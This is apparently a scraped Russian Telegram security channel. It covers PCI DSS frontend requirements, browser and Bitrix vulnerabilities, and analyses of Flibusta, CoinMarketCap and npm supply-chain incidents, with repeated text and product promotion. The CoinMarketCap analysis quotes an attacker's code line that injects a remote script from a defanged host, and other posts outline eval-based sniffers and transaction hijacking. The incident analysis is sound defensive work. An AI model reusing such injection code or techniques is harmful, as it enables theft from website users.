31 марта 2025 перешли в статус обязательных требования PCI DSS 4.0.1 для frontend-приложений
Обязательность выполнения требований актуальной версии PCI DSS указана в Программе безопасности ПС «Мир» / НСПК.
🔹 6.4.3 Все скрипты платежных страниц, которые загружаются и выполняются в браузере пользователя, управляются следующим образом:
- Актуальная инвентаризация всех скриптов с письменным обоснованием бизнес-необходимости каждого из них.
- Реализован метод подтверждения авторизации и целостности каждого скрипта.
🔹 11.6.1 Обнаружение и реагирование на несанкционированное изменение платежных страниц:
- Контроль изменений на платежных страницах.
- Контроль изменений HTTP заголовков (в том числе Content Security Policy (CSP)).
- Оповещение персонала о несанкционированных изменениях.
🔹 Требования также применяются к web-страницам, на которых встроен сторонний iframe c формой оплаты TPSP/платежного процессора.
Использование CSP не может полноценно выполнить эти требования и обеспечить безопасность пользователей⚠️
Точнее сказать выполнить требования для аудитора то может, по принципу "заголовок CSP с хэшами скриптов есть, бизнес-обоснования записываем в блокноте📝 , каждый день проверяем глазами 👁 ..." 😄 (наотъе .. кто здесь 😂? только для галочки аудитора ☑️ ).
Но мы ведь не из таких ... 😎 Мы знаем, что требования появляются не просто так, а для снижения рисков от реальных угроз: js-снифферов, frontend-фишинга, Supply Chain Attack и т.д.
Файл-бандл frontend-приложения📱 включает все зависимости (десятки-сотни opensource-библиотек) и изменяется при каждом релизе приложения ➡️ изменяется хэш файла ➡️ меняем заголовок CSP. Бизнес-обоснование? "Это главный скрипт приложения". Кто-то проверял, что в новые версии зависимостей не был встроен js-сниффер? Нет. 🤨 Но формально требования PCI DSS выполнены ☑️
Кстати, НКЦКИ требует именно проверку скриптов на вредоносные действия после любых изменений, а не только контроль целостности.
Допустим разрешенные хэши скриптов в CSP указали, а вот запретить eval() забыли (формально, не требуется). Вредоносный код в зависимости хранит пейлоад в base64➡️ извлекает код сниффера ➡️ выполняет через eval() ➡️ данные карт клиентов 💳 похищаются прямо в браузере пользователя в "слепой зоне" для WAF, NGFW, DLP... 🤨
Даже при самой строгой CSP попавший на страницу вредоносный код может отправить данные на хост злоумышленника через механизм навигации.
В разъяснительной части PCI DSS 4.0.1, сказано: "Единственное место, где можно обнаружить изменения и признаки вредоносной активности — это браузер пользователя, где страница полностью собрана и выполнен весь JavaScript-код".
Без глубокого анализа поведения js-кода в реальном браузере📱 / frontend-sandbox (например, DPA FAST Analyzer) невозможно провести достоверную инвентаризацию скриптов и обнаружить утечки данных в frontend-приложении.
PCI DSS 4.0.1 - первый стандарт, в явном виде зафиксировавший необходимость обеспечения безопасности frontend-ов и должен являться best practice для всех компаний✅
Давайте защищать🛡 наших пользователей, их данные и репутацию компании, а не делать что-то только для "галочки" аудитора ☑️
@FrontSecOps
Обязательность выполнения требований актуальной версии PCI DSS указана в Программе безопасности ПС «Мир» / НСПК.
🔹 6.4.3 Все скрипты платежных страниц, которые загружаются и выполняются в браузере пользователя, управляются следующим образом:
- Актуальная инвентаризация всех скриптов с письменным обоснованием бизнес-необходимости каждого из них.
- Реализован метод подтверждения авторизации и целостности каждого скрипта.
🔹 11.6.1 Обнаружение и реагирование на несанкционированное изменение платежных страниц:
- Контроль изменений на платежных страницах.
- Контроль изменений HTTP заголовков (в том числе Content Security Policy (CSP)).
- Оповещение персонала о несанкционированных изменениях.
🔹 Требования также применяются к web-страницам, на которых встроен сторонний iframe c формой оплаты TPSP/платежного процессора.
Использование CSP не может полноценно выполнить эти требования и обеспечить безопасность пользователей
Точнее сказать выполнить требования для аудитора то может, по принципу "заголовок CSP с хэшами скриптов есть, бизнес-обоснования записываем в блокноте
Но мы ведь не из таких ... 😎 Мы знаем, что требования появляются не просто так, а для снижения рисков от реальных угроз: js-снифферов, frontend-фишинга, Supply Chain Attack и т.д.
Файл-бандл frontend-приложения
Кстати, НКЦКИ требует именно проверку скриптов на вредоносные действия после любых изменений, а не только контроль целостности.
Допустим разрешенные хэши скриптов в CSP указали, а вот запретить eval() забыли (формально, не требуется). Вредоносный код в зависимости хранит пейлоад в base64
Даже при самой строгой CSP попавший на страницу вредоносный код может отправить данные на хост злоумышленника через механизм навигации.
В разъяснительной части PCI DSS 4.0.1, сказано: "Единственное место, где можно обнаружить изменения и признаки вредоносной активности — это браузер пользователя, где страница полностью собрана и выполнен весь JavaScript-код".
Без глубокого анализа поведения js-кода в реальном браузере
PCI DSS 4.0.1 - первый стандарт, в явном виде зафиксировавший необходимость обеспечения безопасности frontend-ов и должен являться best practice для всех компаний
Давайте защищать
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
Завтра (25 апреля) в 13:15-13:40 (МСК) на AppSecFest 2025 (Алматы, Казахстан) выступаю с докладом "Frontend Application Security Testing (FAST). Задачи подхода и место в DevSecOps/SSDLC". Приходите в зал Security или подключайтесь к бесплатной трансляции на сайте https://appsecfest.kz
Frontend SSDLC и уязвимости браузеров
29 апреля 2025 вышла версия (136.0.7103.59) Google Chrome с исправлением CVE-2025-4096 -⚠️ high-уязвимости в Chrome 📱 и Chromium-based браузерах. Уязвимость класса Heap buffer overflow в движке HTML. Эксплуатация уязвимости (создание на веб-странице специального сформированного фрагмента) может привести к выполнению произвольного кода на устройстве пользователя. За обнаружение уязвимости исследователю было выплачено 5000$ 💰
Это уже не первая опасная уязвимость в Chromium в этом году.
Заражение устройств пользователей⌨️ через эксплуатацию уязвимостей браузеров - один из способов монетизации злоумышленниками внедрения вредоносного js-кода в frontend-приложения. Вредоносный код может попасть в js-приложение со сторонними библиотеками (npm-зависимости ✈️ ) или через внешние js-сервисы 📱 (системы аналитики, счетчики, тег-менеджеры и т.п.).
Внедрение вредоносного js-кода в популярное приложение/сайт дает возможность заразить значительное количество устройств пользователей, а также проникать в корпоративные сети. Через frontend-приложения возможно заразить устройства даже во внутренних сетях без интернета⚠️
Например, вы устанавливаете новую версию внутрисетевого приложения (ERP, CRM, SIEM, WAF, VM или любое другое ПО с браузерным UI, даже SAST, DAST, SCA, веб сейчас повсюду), а вендор ПО не проверяет frontend-часть на вредоносное поведение (ограничивается только проверкой версий зависимостей по базам известных уязвимостей).
Далее вредоносный js-код, при открытии пользователем страницы🖥 :
1. эксплуатирует уязвимость браузера🌐
2. имитирует скачивание файла (pdf, docx, ...) с эксплойтом для офисного ПО💣
3. показывает фишинговые уведомления🤒 ⌨️
В итоге: заражение устройства пользователя в корпоративной сети без интернета и дальнейшее развитие атаки🤒
Анализируйте поведение ваших frontend-приложений🔍 (целью являются ваши пользователи!) и требуйте этого от поставщиков используемого ПО. Даже внутрисетевого⚠️
@FrontSecOps
29 апреля 2025 вышла версия (136.0.7103.59) Google Chrome с исправлением CVE-2025-4096 -
Это уже не первая опасная уязвимость в Chromium в этом году.
Заражение устройств пользователей
Внедрение вредоносного js-кода в популярное приложение/сайт дает возможность заразить значительное количество устройств пользователей, а также проникать в корпоративные сети. Через frontend-приложения возможно заразить устройства даже во внутренних сетях без интернета
Например, вы устанавливаете новую версию внутрисетевого приложения (ERP, CRM, SIEM, WAF, VM или любое другое ПО с браузерным UI, даже SAST, DAST, SCA, веб сейчас повсюду), а вендор ПО не проверяет frontend-часть на вредоносное поведение (ограничивается только проверкой версий зависимостей по базам известных уязвимостей).
Далее вредоносный js-код, при открытии пользователем страницы
1. эксплуатирует уязвимость браузера
2. имитирует скачивание файла (pdf, docx, ...) с эксплойтом для офисного ПО
3. показывает фишинговые уведомления
В итоге: заражение устройства пользователя в корпоративной сети без интернета и дальнейшее развитие атаки
Анализируйте поведение ваших frontend-приложений
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
RCE уязвимость в модулях CMS Bitrix (BDU:2025-03006) 🆘
Уязвимость в модулях «Экспорт/Импорт товаров в Excel» от стороннего разработчика. Злоумышленник может выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса. Данной уязвимости подвержены несколько тысяч web-приложений. Эксплуатируется с марта 2025 года.
⚠️ Критичность 8,8 по CVSS 3.0
https://www.pentestnotes.ru/notes/bitrix_excel_rce/
https://bdu.fstec.ru/vul/2025-03006
https://www.1c-bitrix.ru/vul_dev/
После устранения уязвимости рекомендую проверить целостность js-кода🔍 и провести анализ поведения frontend-части Bitrix. Злоумышленники могли встроить в код js-сниффер, js-майнер и т.д.
Часто злоумышленники делают именно так: взлом производится через уязвимости бэкенда/CMS, а монетизация взлома через внедрение вредоносного кода в frontend-приложение, что позволяет увеличить время присутствия и максимизировать монетизацию💰
Антивирусы неэффективны для проверки js-файлов, код может быть обфусцирован или динамически подгружаться со сторонних хостов при открытии страницы в браузере🖥 (это не отличимо от нормального поведения приложения).
@FrontSecOps
Уязвимость в модулях «Экспорт/Импорт товаров в Excel» от стороннего разработчика. Злоумышленник может выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса. Данной уязвимости подвержены несколько тысяч web-приложений. Эксплуатируется с марта 2025 года.
https://www.pentestnotes.ru/notes/bitrix_excel_rce/
https://bdu.fstec.ru/vul/2025-03006
https://www.1c-bitrix.ru/vul_dev/
После устранения уязвимости рекомендую проверить целостность js-кода
Часто злоумышленники делают именно так: взлом производится через уязвимости бэкенда/CMS, а монетизация взлома через внедрение вредоносного кода в frontend-приложение, что позволяет увеличить время присутствия и максимизировать монетизацию
Антивирусы неэффективны для проверки js-файлов, код может быть обфусцирован или динамически подгружаться со сторонних хостов при открытии страницы в браузере
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
23 мая на PHDays Fest выступаю с докладом "Взгляд в темноту. Безопасность frontend-приложений от модели угроз до secure by design"
Покажу:
1️⃣ Результаты исследования безопасности > 3000 российских frontend-приложений, проведенного с помощью FAST-анализатора. Посмотрим, сколько приложений отправляют персональные данные за границу ⚠️ ; сколько используют CSP и насколько эффективно ее конфигурируют; какая российская система web-аналитики уютно хостится в Ирландии 🇮🇪 , и многое другое...
2️⃣ Собственный фреймворк моделирования угроз для frontend-приложений с оценкой рисков и мерами митигации; почему существующие методики и каталоги угроз вредят frontend-безопасности, и что с этим делать.
3️⃣ Как автоматизированный анализ поведения frontend-приложения в DevSecOps нейтрализует актуальные угрозы, выводит frontend-приложения из "слепой" зоны и приводит нас к реальному Secure by Design 🛡
Приходите или подключайтесь к бесплатной трансляции на сайте
23 мая 2025 (пятница)
12:00–13:00 (МСК)
Зал 21 «Лавлейс»
Трек Development Security
Встречаемся на PHDays Fest!
@FrontSecOps
Покажу:
Приходите или подключайтесь к бесплатной трансляции на сайте
23 мая 2025 (пятница)
12:00–13:00 (МСК)
Зал 21 «Лавлейс»
Трек Development Security
Встречаемся на PHDays Fest!
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
Запись доклада "Взгляд в темноту. Безопасность frontend-приложений от модели угроз до secure by design" с PHDays Fest 3. Презентация доступна здесь.
00:00 Вступление
Часть 1
01:24 Frontend - всегда в "слепой" зоне
03:10 Выгода злоумышленника от внедрения вредоносного кода в frontend-приложения
04:49 Вектора проникновения вредоносного кода в приложение
06:01 Обзор крупнейших инцидентов
09:53 Frontend - идеальный способ монетизации для злоумышленников, в т.ч. инсайдеров
Часть 2
10:30 Исследование безопасности российских frontend-приложений
11:32 Основные показатели
13:43 Наиболее интересные результаты по отраслям
14:22 Количество хостов, на которые frontend отправляет данные
14:37 Эффективность использования Content Security Policy (CSP)
17:00 Google Tag Manager - frontend-бэкдор, угрожающий данным наших пользователей
18:27 CMS Битрикс отправляет персональные данных ваших клиентов в Ирландию - риск штрафов РКН за трансграничную передачу ПД без согласия пользователей🆘
20:20 Яндекс Метрика Вебвизор - может стать легитимным каналом утечки ПД из личных кабинетов в руках злоумышленника
21:28 Общий показатель безопасности
Часть 3
23:18 Моделирование угроз для frontend-приложений
24:10 Существующие каталоги угроз приводят к игнорированию frontend-безопасности
25:09 Фреймворк моделирования frontend-угроз DPA Analytics
27:40 Митигация рисков через Observability
Часть 4
29:20 Анализ поведения frontend-приложения в DevSecOps - путь к Secure by Design
29:32 OWASP: SAST, DAST, IAST имеют низкую достоверность при анализе frontend-приложения
30:02 FAST-анализатор - инструмент для достоверного анализа безопасности и оперативного реагирования без ложных срабатываний
Часть 5
31:46 Что делать? Как сделать frontend безопасным?
33:15 Ссылки
33:19 Telegram-канал @FrontSecOps : в июне опубликую бесплатный онлайн-сервис для моделирования frontend-угроз и полный отчет об исследовании безопасности российских frontend-приложений
📹 Запись на YT
@FrontSecOps
00:00 Вступление
Часть 1
01:24 Frontend - всегда в "слепой" зоне
03:10 Выгода злоумышленника от внедрения вредоносного кода в frontend-приложения
04:49 Вектора проникновения вредоносного кода в приложение
06:01 Обзор крупнейших инцидентов
09:53 Frontend - идеальный способ монетизации для злоумышленников, в т.ч. инсайдеров
Часть 2
10:30 Исследование безопасности российских frontend-приложений
11:32 Основные показатели
13:43 Наиболее интересные результаты по отраслям
14:22 Количество хостов, на которые frontend отправляет данные
14:37 Эффективность использования Content Security Policy (CSP)
17:00 Google Tag Manager - frontend-бэкдор, угрожающий данным наших пользователей
18:27 CMS Битрикс отправляет персональные данных ваших клиентов в Ирландию - риск штрафов РКН за трансграничную передачу ПД без согласия пользователей
20:20 Яндекс Метрика Вебвизор - может стать легитимным каналом утечки ПД из личных кабинетов в руках злоумышленника
21:28 Общий показатель безопасности
Часть 3
23:18 Моделирование угроз для frontend-приложений
24:10 Существующие каталоги угроз приводят к игнорированию frontend-безопасности
25:09 Фреймворк моделирования frontend-угроз DPA Analytics
27:40 Митигация рисков через Observability
Часть 4
29:20 Анализ поведения frontend-приложения в DevSecOps - путь к Secure by Design
29:32 OWASP: SAST, DAST, IAST имеют низкую достоверность при анализе frontend-приложения
30:02 FAST-анализатор - инструмент для достоверного анализа безопасности и оперативного реагирования без ложных срабатываний
Часть 5
31:46 Что делать? Как сделать frontend безопасным?
33:15 Ссылки
33:19 Telegram-канал @FrontSecOps : в июне опубликую бесплатный онлайн-сервис для моделирования frontend-угроз и полный отчет об исследовании безопасности российских frontend-приложений
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
В мае мы провели исследование безопасности российских frontend-приложений. Были проверены приложения более 3000 крупнейших коммерческих компаний. Краткие результаты исследования я представил в своем докладе на PHDays 2025.
Было обнаружено, что:
🔹 64 % приложений загружают скрипты с хостов за пределами РФ.
🔹 71 % приложений отправляют сетевые запросы на зарубежные хосты.
После анализа наиболее часто встречающихся зарубежных хостов мы увидели хост bitrix.info, указывающий на сервер в подсети Amazon в Ирландии
Изучаем подробнее. Действительно все эти приложения построены на CMS 1С-Битрикс. В коде веб-страниц размещен инлайн-скрипт
Являются ли данные, собираемые системами веб-аналитики, персональными?
Можно долго спорить на эту тему, но предлагаю смотреть с т.з. рисков, а именно рисков проверок/штрафов регуляторов.
Поэтому на мой взгляд данные, собираемые любой системой аналитики, следует считать персональными. Следовательно CMS Битрикс отправляет персональные данные пользователей/клиентов в Ирландию
Сколько компаний в зоне риска?
По результатам исследования скрипт Битрикс Аналитики обнаружен в 21 % web-приложений, это более 650 крупнейших российских компаний.
Мы развернули актуальную версию 1С-Битрикс: Управление сайтом (версия 25.100.400). В документации на CMS отсутствует упоминание внешнего скрипта аналитики, размещенного в Ирландии. Скрипт внедряется по дефолту во все редакции CMS (вспоминаем про принцип Privacy by Default). В админ-панели нет опции для отключения внедрения скрипта. (см. как отключить)
Заключение
🔹 С точки зрения ИБ подобное поведение приложения - это «недекларированные возможности» (НДВ).
🔹 Трансграничная передача ПД без уведомления РКН запрещена, данная функциональность CMS повышает риск получения штрафов для компаний.
🔹 Вендоры ПО должны анализировать поведение своих frontend-приложений, чтобы не подвергать риску своих заказчиков/клиентов (утечки в frontend-приложениях не обнаруживаются WAF, NGWF и другими средствами защиты и анализаторами SAST, DAST, SCA/OSA, т.к. происходят в «слепой» зоне - прямо в браузере пользователя).
🔹 ИБ/AppSec-специалисты должны анализировать поведение frontend-приложений, чтобы обнаруживать и реагировать на подобное для снижения рисков утечки данных и атак на пользователей.
UPDATE 18.06.2025
Со мной связались коллеги из Битрикс, данная функция будет удалена в ближайших обновлениях CMS. Несколько дней назад (около 07.06.2025) сервис был перенесен на территорию РФ. В данный момент по адресу https://bitrix.info/ba.js отдается пустой скрипт, т.е. сбор данных не осуществляется. Спасибо коллегам из Битрикс за оперативное реагирование 👍🏽
P.S. Судя по истории изменения DNS записей, сервис размещался в Ирландии с 2014 года.
Даже при защищенном бэкенде Ваших web-приложений данные могут годами утекать прямо в браузере пользователя
Спасибо команде DPA Analytics за проведенное исследование. Только по итогам данного кейса мы снизили риски получения санкций/штрафов регуляторов за трансграничную передачу данных для сотен российских компаний.
Если хотите увидеть, куда текут данных из Ваших frontend-приложений, и узнавать о вредоносных действиях скриптов сразу
Полная версия статьи - на Хабре
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет!
Завтра (в пятницу, 27.06.2025) в 11:00 (МСК) принимаю участие в эфире AM Live. С коллегами будем говорить про безопасную разработку: культуру, регуляторику, моделирование угроз, технологии и инструменты: SAST, SCA, FAST, DAST, API Sec и т.д.
Трансляция бесплатная и будет доступна после регистрации
В понедельник⏰ (30.06) опубликую онлайн-сервис для моделирования угроз для frontend-приложений, о котором рассказывал на PHDays.
Завтра (в пятницу, 27.06.2025) в 11:00 (МСК) принимаю участие в эфире AM Live. С коллегами будем говорить про безопасную разработку: культуру, регуляторику, моделирование угроз, технологии и инструменты: SAST, SCA, FAST, DAST, API Sec и т.д.
Трансляция бесплатная и будет доступна после регистрации
В понедельник
Please open Telegram to view this post
VIEW IN TELEGRAM
Мы опубликовали сервис для моделирования угроз для frontend-приложений!
В основе - методология, о которой рассказывал в докладе на PHDays 2025. Для каждой угрозы указаны компенсирующие меры с оценкой эффективности. Также автоматически генерируется план обработки рисков (остаточных рисков).
Значительную часть угроз нейтрализует использование FAST-анализатора в SSDLC/DevSecOps. Не потому что мы его делаем 😀, а т.к. только использование frontend-песочницы для анализа поведения приложения при автоматизированном выполнении основных Use Case взаимодействий пользователя с приложением🖥 может обнаружить вредоносное поведение js-кода 🦠 , в том числе во внешних сервисах 📱 :
1️⃣ до релиза;
2️⃣ сразу после релиза;
3️⃣ через длительное время после релиза.
Сервис и каталог угроз будет развиваться и дорабатываться. В ближайшее время сделаем визуализацию векторов/способов реализации/последствий (по принципу MITRE ATT&CK Matrix)🔗
Вопросы/предложения можно направлять на threatmodel@dpa-analytics.ru
@FrontSecOps
В основе - методология, о которой рассказывал в докладе на PHDays 2025. Для каждой угрозы указаны компенсирующие меры с оценкой эффективности. Также автоматически генерируется план обработки рисков (остаточных рисков).
Значительную часть угроз нейтрализует использование FAST-анализатора в SSDLC/DevSecOps. Не потому что мы его делаем 😀, а т.к. только использование frontend-песочницы для анализа поведения приложения при автоматизированном выполнении основных Use Case взаимодействий пользователя с приложением
Сервис и каталог угроз будет развиваться и дорабатываться. В ближайшее время сделаем визуализацию векторов/способов реализации/последствий (по принципу MITRE ATT&CK Matrix)
Вопросы/предложения можно направлять на threatmodel@dpa-analytics.ru
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Технологический Болт Генона
Исследователи безопасности из компании Secure Annex обратили внимание на рост популярности нового метода монетизации браузерных дополнений, при котором из пользователей дополнений формируется распределённая сеть, применяемая для скрапинга (индексации содержимого сайтов). Системы пользователей используют в качестве web-ботов и прокси для скачивания содержимого сайтов - установленное браузерное дополнение получает с внешнего сервера инструкции по индексации сайтов, после чего в отдельном скрытом iframe запускает загрузку запрошенного контента и передаёт полученные данные внешнему сервису. В каталогах Chrome, Firefox и Edge применение данной схемы монетизации выявлено в 245 дополнениях, в сумме насчитывающих 909 тысяч установок.Работа организуется через включение в код браузерных дополнений открытой JavaScript-библиотеки mellowtel.js, поставляемой под лицензией LGPLv3. Библиотека развивается проектом Mellowtel, продвигающим новую платформу монетизации, которая кроме браузерных дополнений может применяться в программах на базе фреймворков Flutter и Electron. Основная идея платформы в том, что разработчики браузерных дополнений и приложений могут зарабатывать деньги не через показ рекламы или сомнительные методы, такие как продажа данных, ущемляющих приватность пользователей, а через выполнение задач по индексации web-контента для обучения AI-систем.Проблема в том, что не все разработчики дополнений готовы работать честно и в открытую. В некоторых дополнениях пытаются скрыто от пользователя включить монетизацию Mellowtel в обход правил сервиса, что приводит к тому, что пользователь без явного согласия становится участником распределённой сети для загрузки данных с сайтов. Из 45 дополнений к Chrome, применяющих Mellowtel, 12 уже заблокированы Google за вредоносную активность. В каталоге Microsoft из 129 дополнений заблокировано 8, а в каталоге Mozilla из 71 дополнения заблокировано 2. Причины удаления не детализируются, но не исключается, что поводом стало некорректное использование Mellowtel.Разработчик Mellowtel заявил, что для решения проблемы с возможным скрытым включением скрапинга сервис переходит на обязательную проверку всех дополнений, применяющих Mellowtel, на предмет обязательного отключения скрапинга по умолчанию (активация только после явного согласия пользователя) и наличия видимой кнопки для отключения. Запросы на получение заданий от дополнений не прошедших проверку будут помещаться в карантин и игнорироваться.Браузерные дополнения вовлекают в построение распределённой сети скрапинга для AI-ботов
https://www.opennet.ru/opennews/art.shtml?num=63568
Оригинал
Mellow Drama: Turning Browsers Into Request Brokers
https://secureannex.com/blog/mellow-drama/
Media is too big
VIEW IN TELEGRAM
FAST-анализатор: обнаружение вредоносного поведения js-кода на примере реального инцидента
Специалисты компании F6 c помощью XDR обнаружили заражение майнером криптовалюты рабочей станции их заказчика. В результате расследования выяснилось, что zip-архив с майнером скачивался пользователем на сети сайтов онлайн-библиотеки Flibusta📚 . Скорее всего, сайты были взломаны, а для монетизации злоумышленники добавили вредоносный js-скрипт 📱
В видео показал, как FAST-анализатор обнаруживает вредоносные действия js-кода на примере реального скрипта злоумышленников.
Что делал скрипт?
🔹Похищал логин, пароль и cookie при выполнении аутентификации (классический js-сниффер).
🔹Динамически загружал в браузер необходимые злоумышленнику модули с CDN.
🔹Использовал сборку Python и MicroPip в виде WebAssembly для выполнения части вредоносных действий из js-кода.
🔹Записывал различные флаги в localStorage, indexedDB, маскируясь под GoogleAds.
🔹Проверял, что пользователь зашел с устройства Desktop.
🔹Вместо архива с книгой загружал архив с вредоносным исполняемым файлом (exe + dll), устанавливающим майнер в систему.
Посещаемость данных сайтов - около 10 млн человек в месяц, из них с Desktop - 1 млн.
Вредоносный скрипт был доступен с февраля 2025. На сайт был внедрен ориентировочно в марте 2025. Т.е. за 3 месяца присутствия архив с майнером мог быть загружен на 3 млн устройств.
Обратите внимание, что майнер был обнаружен с помощью XDR уже после заражения рабочей станции. Frontend-фишинг позволяет проникать даже в корпоративные сети⚠️ . А если вредоносный js-код будет доставлен в приложение через npm-зависимость ✈️ , то возможно заразить устройства даже в корп. сетях без интернета. Вместо майнера мог быть шифровальщик 🤒 или другое вредоносное ПО.
По фреймворку моделирования угроз DPA Analytics:
🔹Вектор: T-3: Компрометация сервера приложения
🔹Способ реализации: T-29: Загрузка вредоносного файла; T-26: Кража учетных данных; T-41: Несанкционированный вызов WebAssembly, eval(); T-45: Выполнение действий при клике по кнопке и другие
Любой вредоносный js-код приводит к появлению значительного "шума"🆘 в профиле поведения приложения. Мы записали видео, как FAST-анализатор без ложных срабатываний по множеству аномалий обнаружил вредоносные действия на примере реального скрипта из данного инцидента.
Смотрите видео в этом посте или на любых площадках:
📹 YT 📺 VK 📺 RT
@FrontSecOps
Специалисты компании F6 c помощью XDR обнаружили заражение майнером криптовалюты рабочей станции их заказчика. В результате расследования выяснилось, что zip-архив с майнером скачивался пользователем на сети сайтов онлайн-библиотеки Flibusta
В видео показал, как FAST-анализатор обнаруживает вредоносные действия js-кода на примере реального скрипта злоумышленников.
Что делал скрипт?
🔹Похищал логин, пароль и cookie при выполнении аутентификации (классический js-сниффер).
🔹Динамически загружал в браузер необходимые злоумышленнику модули с CDN.
🔹Использовал сборку Python и MicroPip в виде WebAssembly для выполнения части вредоносных действий из js-кода.
🔹Записывал различные флаги в localStorage, indexedDB, маскируясь под GoogleAds.
🔹Проверял, что пользователь зашел с устройства Desktop.
🔹Вместо архива с книгой загружал архив с вредоносным исполняемым файлом (exe + dll), устанавливающим майнер в систему.
Посещаемость данных сайтов - около 10 млн человек в месяц, из них с Desktop - 1 млн.
Вредоносный скрипт был доступен с февраля 2025. На сайт был внедрен ориентировочно в марте 2025. Т.е. за 3 месяца присутствия архив с майнером мог быть загружен на 3 млн устройств.
Обратите внимание, что майнер был обнаружен с помощью XDR уже после заражения рабочей станции. Frontend-фишинг позволяет проникать даже в корпоративные сети
По фреймворку моделирования угроз DPA Analytics:
🔹Вектор: T-3: Компрометация сервера приложения
🔹Способ реализации: T-29: Загрузка вредоносного файла; T-26: Кража учетных данных; T-41: Несанкционированный вызов WebAssembly, eval(); T-45: Выполнение действий при клике по кнопке и другие
Любой вредоносный js-код приводит к появлению значительного "шума"
Смотрите видео в этом посте или на любых площадках:
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
CoinMarketCap: вредоносный код на фронтенде украл у пользователей 43 000$ за 1 день
Даже если вы не можете сказать про себя "я работаю в криптовалюте"💸 , наверняка вы знаете сервис CoinMarketCap (coinmarketcap.com).
20 июня 2025 (пятница) 20:57 GMT, конец рабочей недели, на главной странице CoinMarketCap стало появляться всплывающее окно , призывающее пользователей «верифицировать свои кошельки», чтобы «сохранить полный доступ» к платформе. Если пользователь соглашался и нажимал нужные кнопки, начинал работать дрейнер🦠 , производилось похищение криптовалюты.
Вредоносный код пришел через "дудл"
Дудл (тематическая картинка рядом с логотипом, приуроченная к различным событиям/праздникам📆 ) загружался динамически через запрос к внутреннему API https://api[.]coinmarketcap[.]com/content/v3/doodle/get?type=5.
В какой-то момент API стало возвращать JSON со ссылкой на вредоносный скрипт📱 на внешнем CDN ("lightModeFile": "https://static[.]cdnkit[.]io/cmc/6855a83d80876056dab0a5cf[.]json", который в свою очередь динамически добавлял на страницу еще один скрипт злоумышленника:
Этот скрипт показывал то самое всплывающее окно в стиле дизайна CoinMarketCap (frontend-фишинг🤒 ). В процессе выполнения вредоносных действий также загружались дополнительные js-библиотеки с хоста blockassets[.]app.
Вектор атаки
Так как ссылка на инициирующий вредоносный скрипт возвращалась в ответе внутренней API функции, наиболее вероятно, что бэкенд был скомпрометирован🤒 или вредонос был добавлен инсайдером 🪪 (сотрудники/подрядчики). CoinMarketCap признали факт инцидента, назвав его "уязвимостью, приводившей к непредвиденному всплывающему окну" 🙃 , без раскрытия подробностей и заявили, что "теперь все безопасно и надежно".
Время присутствия: 1 день.
Похищенные средства у пользователей: > 43 000💵
DPA Frontend Threat Modeling Framework:
🔹Вектор: T-3: Компрометация сервера приложения / T-21: Сотрудник умышленно разместил вредоносный js-код
🔹Способ реализации: T-43: Показ фишинговых форм привязки криптокошелька, T-45: Выполнение действий при клике по кнопке и другие, T-47: Вредоносный код выполняется только при определенных условиях/триггерах
@FrontSecOps
Даже если вы не можете сказать про себя "я работаю в криптовалюте"
20 июня 2025 (пятница) 20:57 GMT, конец рабочей недели, на главной странице CoinMarketCap стало появляться всплывающее окно , призывающее пользователей «верифицировать свои кошельки», чтобы «сохранить полный доступ» к платформе. Если пользователь соглашался и нажимал нужные кнопки, начинал работать дрейнер
Вредоносный код пришел через "дудл"
Дудл (тематическая картинка рядом с логотипом, приуроченная к различным событиям/праздникам
В какой-то момент API стало возвращать JSON со ссылкой на вредоносный скрипт
// Inject the malicious popup script
const script = document.createElement('script');
script.src = 'https://static[.]cdnkit[.]io/cmc/popup[.]js';
document.head.appendChild(script);
Этот скрипт показывал то самое всплывающее окно в стиле дизайна CoinMarketCap (frontend-фишинг
Вектор атаки
Так как ссылка на инициирующий вредоносный скрипт возвращалась в ответе внутренней API функции, наиболее вероятно, что бэкенд был скомпрометирован
Время присутствия: 1 день.
Похищенные средства у пользователей: > 43 000
DPA Frontend Threat Modeling Framework:
🔹Вектор: T-3: Компрометация сервера приложения / T-21: Сотрудник умышленно разместил вредоносный js-код
🔹Способ реализации: T-43: Показ фишинговых форм привязки криптокошелька, T-45: Выполнение действий при клике по кнопке и другие, T-47: Вредоносный код выполняется только при определенных условиях/триггерах
@FrontSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
Очередная frontend-катастрофа в npm 💣
Вредоносный js-код добавлен в 18+ npm-зависимостей для frontend-приложений. Суммарно эти зависимости имеют более 2 миллиардов загрузок в неделю.
Атака типичная: фишинговое письмо🤒 разработчику "от имени npm", кража токена, публикация вредоносной версии библиотеки от имени разработчика (также как в инцидентах solana/web3.js , lottie-player).
Код злоумышленников переопределял функции для отправки сетевых запросов fetch, XMLHttpRequest, и API кошельков (window.ethereum, Solana и др.), анализировал запросы/ответы и на лету подменял получателя в криптовалютных транзакциях.
Цель злоумышленников - frontend-приложения с функциями перевода криптовалюты💸 . В других приложениях непосредственно деструктивные действия не выполняются (хотя иногда злоумышленники кроме целевых, добавляют всенаправленные вредоносные нагрузки, например js-сниффер отправленных форм в инциденте Flibusta).
⚠️ Не всегда подобные инциденты освещаются во всех новостях как в этот раз. И в фидах SCA-вендоров тоже может не быть такой информации в следующих случаях.
1️⃣ Непопулярные библиотеки и форки
2️⃣ Разработчик сам добавляет вредоносный код в библиотеку (polyfill.js, colors и faker)
3️⃣ Мейнтейнеры не заметили, что вредоносный код был добавлен одним из них
4️⃣ Вредоносную библиотеку использует внешний js-сервис, который используется в нашем приложении
5️⃣ Ситуация может осложняться запуском вредоносного кода по условию, например по дате, допустим через 6 месяцев ⏰ , чтобы скомпрометированная версия распространилась по большинству "живых" frontend-приложений по всему миру 🌍
В этих случаях вредоносный js-код может месяцами📆 присутствовать в наших frontend-приложениях, если мы не анализируем поведение приложения до релиза и регулярно после релиза в продуктиве.
@FrontSecOps
